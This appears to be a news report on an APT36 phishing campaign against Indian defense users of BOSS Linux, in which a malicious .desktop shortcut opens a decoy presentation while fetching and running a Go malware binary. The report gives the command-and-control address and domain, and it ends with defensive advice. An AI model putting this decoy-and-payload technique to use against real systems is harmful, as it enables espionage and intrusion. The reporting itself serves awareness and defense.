A sophisticated cyber espionage campaign attributed to a group known as APT36, or Transparent Tribe, is currently targeting Indian defense personnel and organizations. This Pakistan-based group has shifted its focus to systems operating on BOSS Linux (Bharat Operating System Solutions), an Indian Linux distribution derived from Debian that is widely utilized by government entities in India.
The incorporation of malicious software specifically designed for Linux environments marks a significant escalation in their tactics. Cybersecurity firm Cyfirma reported these findings, which were later disseminated through various cybersecurity news platforms.
Researchers from Cyfirma first identified this new wave of attacks on June 7, 2025. According to their analysis, the attackers are employing deceptive phishing techniques to lure their targets. Victims receive emails containing a compressed file, typically titled “Cyber-Security-Advisory.zip,” which conceals a harmful ‘.desktop’ file—a type of shortcut used in Linux systems.
When an unsuspecting user opens the shortcut, the attack unfolds in two ways. First, a benign-looking PowerPoint file is presented to divert the user’s attention, appearing as if it were a legitimate document. This distraction is facilitated by the desktop file, which concurrently downloads and opens the PowerPoint file.
Simultaneously, a hidden malicious program named BOSS.elf, stored locally as client.elf, is downloaded and executed in the background. This Executable and Linkable Format (ELF) binary is similar in function to a Windows .exe file and is crafted using the Go programming language. Its primary objective is to compromise the host system, allowing for unauthorized access.
The malware seeks to establish a connection to a command-and-control server located at the IP address 101.99.92.182 on port 12520. Security analysts have identified the domain sorlastore.com as part of the malicious infrastructure employed by APT36, particularly targeting personnel and systems within the Indian defense landscape.
This intricate, multi-step attack has been crafted to evade security protocols and minimize detection, facilitating prolonged access to sensitive computer systems. The development of Linux-targeted malware indicates a significant increase in APT36’s capabilities, escalated risks for critical government and defense networks.
Monitoring the activities of Transparent Tribe has been ongoing since their prominent Operation C-Major in March 2016, where they utilized spear-phishing and vulnerabilities in Adobe Reader to distribute spyware to Indian military personnel. More recently, in July 2024, their tactics included disguising Android spyware as popular mobile applications to gather sensitive data, suggesting an expansion of targets beyond military units.
As this group continues to adapt its methods and broaden its scope, it is imperative for organizations—particularly those in the public sector relying on Linux-based systems—to treat these threats with utmost seriousness. Robust cybersecurity practices and comprehensive threat detection tools are essential to defend against evolving adversarial tactics.
Jason Soroko, Senior Fellow at a major cybersecurity firm, remarked on the necessity of preventive measures for Linux systems. By disabling auto-execution of desktop shortcuts and enforcing application allowlists, organizations can bolster their defenses. Furthermore, utilizing PowerPoint viewers in read-only mode and ensuring downloads from untrusted networks are restricted can enhance overall security protocols.
